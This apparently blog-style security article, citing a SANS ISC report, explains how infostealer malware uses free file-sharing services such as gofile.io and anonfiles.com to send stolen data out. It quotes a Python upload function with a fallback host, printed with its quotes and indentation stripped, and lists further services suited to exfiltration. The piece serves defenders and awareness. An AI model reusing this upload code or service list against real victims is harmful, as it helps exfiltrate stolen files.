In the digital world, cybercriminals are constantly finding creative ways to circumvent detection and increase the efficiency of their operations. One such method gaining traction is the exploitation of free online services to exfiltrate stolen data. These services, often benign in nature, are being weaponized by attackers to sneak past security defenses. In this article, we explore how attackers are using file-sharing platforms to bypass traditional Command and Control (C2) infrastructures, highlighting specific services being targeted, the ease of abuse, and the emerging alternatives to previously popular services.
Exfiltrating Data Using Free Online Services
Attackers have long understood the advantages of using free online services to exfiltrate data. Rather than setting up complex and costly C2 infrastructures, they take advantage of “official” services, which are often free, widely trusted, and difficult to detect. The real charm lies in the fact that these services blend in with normal web traffic, making them much harder to identify as malicious.
One service that was widely abused for this purpose was anonfiles.com, which became notorious for its use in data exfiltration operations. In 2023, it was shut down due to overwhelming abuse. Even so, many malicious scripts still reference this domain, illustrating its lasting impact. Following its closure, alternative platforms quickly emerged to fill the void, with anonfile.la being one such replacement.
Another popular service abused by cybercriminals is gofile.io. This service has been particularly targeted by infostealers, malware designed to extract sensitive information from infected devices. The process of using gofile.io for data exfiltration is relatively simple: attackers request a server from the platform, upload their stolen data, and then receive a link to the uploaded file. In the event that gofile.io fails, malicious scripts often fall back on anonfiles.com, even though the service has been shut down.
Here’s how this simple script works to upload stolen data to gofile.io:
“`python
def UploadToExternalService(self, path, filename=None) -> str | None:
if os.path.isfile(path):
Logger.info(Uploading %s to gofile % (filename or file))
with open(path, rb) as file:
fileBytes = file.read()
if filename is None:
filename = os.path.basename(path)
http = PoolManager(cert_reqs=CERT_NONE)
try:
server = json.loads(http.request(GET, https://api.gofile.io/getServer).data.decode(errors=ignore))[data][server]
if server:
url = json.loads(http.request(POST, fhttps://{server}.gofile.io/uploadFile, fields={file: (filename, fileBytes)}).data.decode(errors=ignore))[data][downloadPage]
if url:
return url
except Exception:
try:
Logger.error(‘Failed to upload to gofile, trying to upload to anonfiles’)
url = json.loads(http.request(POST, https://api.anonfiles.com/upload, fields={file: (filename, fileBytes)}).data.decode(errors=ignore))[data][file][url][short]
return url
except Exception:
Logger.error(Failed to upload to anonfiles)
return None
“`
It’s notable that even if uploading to gofile.io fails, the script falls back to anonfiles.com, a service that was previously a popular target but has since been shut down. This showcases the ease with which attackers can adapt to changing circumstances in the cybercrime landscape.
Emerging Alternatives and Security Implications
With the shutdown of anonfiles.com, cybercriminals have quickly adapted by turning to other file-sharing platforms. Some of the newer alternatives include:
– transfer.sh
– file.io
– bayfiles.com
– catbox.moe
– filebin.net
– temp.sh
While these services are often not used in corporate environments, they represent a significant threat to organizations that fail to monitor for unusual activity. Tracking domains and IP addresses associated with these platforms could be a crucial step in identifying and mitigating data exfiltration attempts.
What Undercode Say:
The abuse of free file-sharing services by cybercriminals is a growing concern that many security professionals are only just beginning to address. The ease with which attackers can bypass traditional security measures, such as C2 infrastructures and advanced malware detection systems, is troubling. The fact that these services are “official” and seemingly legitimate makes it more difficult for traditional security solutions to flag malicious activity.
One of the most concerning aspects is the sheer number of alternative services now available for data exfiltration. With the rapid evolution of new platforms, defenders face the constant challenge of keeping up with the ever-changing landscape of cybercrime. It’s not enough to simply blacklist known malicious sites; defenders must adopt more proactive strategies, including network traffic analysis and domain reputation monitoring, to spot signs of abuse.
Another point of concern is the increasing sophistication of malicious scripts. As shown in the provided Python code, attackers are utilizing well-established, automated procedures to upload and distribute stolen data. The integration of fallbacks to alternative services demonstrates a high level of adaptability and persistence. These scripts are designed to maximize the chances of a successful exfiltration, even when certain services are taken offline or blocked.
Furthermore, the integration of these services with existing malware strains like infostealers adds an additional layer of complexity to the threat. It’s not just about the stolen data anymore; it’s about the speed and efficiency with which it can be moved across borders and distributed. This type of rapid, low-cost data exfiltration is difficult for traditional security measures to intercept, especially in real-time.
Fact Checker Results:
- The shutdown of anonfiles.com due to abuse in 2023 is accurate, as reported by sources like BleepingComputer.
- The script example provided is consistent with common tactics used in cybercrime, with real-world applications of similar scripts found in infostealer malware.
- The alternative services listed are indeed active and have been associated with various abuse cases, further emphasizing the need for vigilance in monitoring these domains.
References:
Reported By: isc.sans.edu
Extra Source Hub:
https://www.twitter.com
Wikipedia
Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
